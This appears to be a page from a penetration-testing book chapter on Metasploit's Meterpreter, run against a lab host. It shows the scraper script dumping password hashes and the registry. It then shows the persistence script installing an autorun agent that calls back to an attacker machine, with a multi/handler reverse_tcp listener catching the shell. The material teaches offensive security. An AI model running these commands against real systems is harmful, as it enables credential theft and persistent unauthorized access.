94
Chapter 6
meterpreter >
run scraper
[*] New session on 192.168.33.130:1095...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\WINDOWS\TEMP\XklepHOU.reg)
Using Persistence
Meterpreter’s
persistence
script allows you to inject a Meterpreter agent to
ensure that Meterpreter is running even after the target system reboots. If
this is a reverse connection, you can set intervals for the target to connect
back to the attacker machine. If it’s a bind, you can have it attempt to bind
on an interface at a given time.
WARNING
If you use this functionality, be sure that you remove it after you’re done. If you forget to
do this, any attacker can also gain access to the system without authentication!
In the following listing, we run
persistence
and tell Windows to autostart
the agent at boot time (
-X
), wait 50 seconds (
-i 50
) before connection retries,
run on port 443 (
-p 443
), and connect to IP 192.168.33.129. We then estab-
lish a listener for the agent at with
use multi/handler
, and after setting a
couple of options and running
exploit
, we see at that the connection comes
in as expected.
meterpreter >
run persistence -X -i 50 -p 443 -r 192.168.33.129
[*] Creating a persistent agent: LHOST=192.168.33.129 LPORT=443 (interval=50 onboot=true)
[*] Persistent agent script is 316384 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\asSnqrlUDRwO.vbs
[*] Agent executed with PID 3160
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\xEYnaHedooc
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
xEYnaHedooc
msf>
use multi/handler
msf exploit(handler) >
set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) >
set LPORT 443
LPORT => 443
msf exploit(handler) >
set LHOST 192.168.33.129
LHOST => 192.168.33.129
msf exploit(handler) >
exploit
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 2 opened (192.168.33.129:443 -> 192.168.33.130:1120)